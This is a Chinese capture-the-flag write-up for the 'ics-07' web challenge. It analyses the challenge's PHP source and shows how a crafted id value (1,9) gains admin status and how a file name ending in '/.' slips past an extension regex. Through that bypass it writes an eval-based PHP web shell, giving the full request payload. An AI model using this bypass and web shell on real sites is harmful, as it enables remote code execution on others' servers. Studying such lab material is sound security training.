攻防世界 WEB ics-07

这题就是单纯的源码分析,代码一共三段,第一段没什么好看的,page参数不是index.php就行,重点关注后两段,需要注意的点都写了注释了,那么,就总结一下
其实先执行的是第二段,对id参数进行了判断,id参数要有且浮点化第一位不能是1,1.0000和‘1’当然不等,最后一位得是‘9’,因此构造id=1,9
成功回显admin,那么有了admin权限,就可以判断第一段,文件路径是拼接来的,完整路径是uploaded/backup/文件名也是用户自己起,只不过正则过滤掉php,php3,
php4,php5,php7这几个后缀,但是因为$,他只在最后判断.php后缀,所以只要结尾的不是.php就可以过这个正则
构造shell.php/.,当linux读取到shell.php会自动调用php程序去处理,/.表示调用shell.php文件本身,因此我们的文件也就传了上去,成功写入,后面就是菜刀或者蚁剑连接
就好

给一个完整payload index.php?page=flag.php&id=1,9
POST数据:con=<?php @eval($_POST['nihao']); ?>&file=shell.php/.
 <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];//con是shell内容
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){//注意这个$,不然这个正则你可能了解歪了
          die("Bad file extension");
       }else{
            chdir('uploaded');//文件夹路径应该在uploaded/backup/
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>
 <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { //id=1,9,经测试,数据库里只有一条数据,因此只有1能回显
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

那个视频里我最后蚁剑连不上是因为把con错写成了conn,做法没问题,大家注意一下就好
参考视频链接:https://www.bilibili.com/video/BV1Hv411A7GQ/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值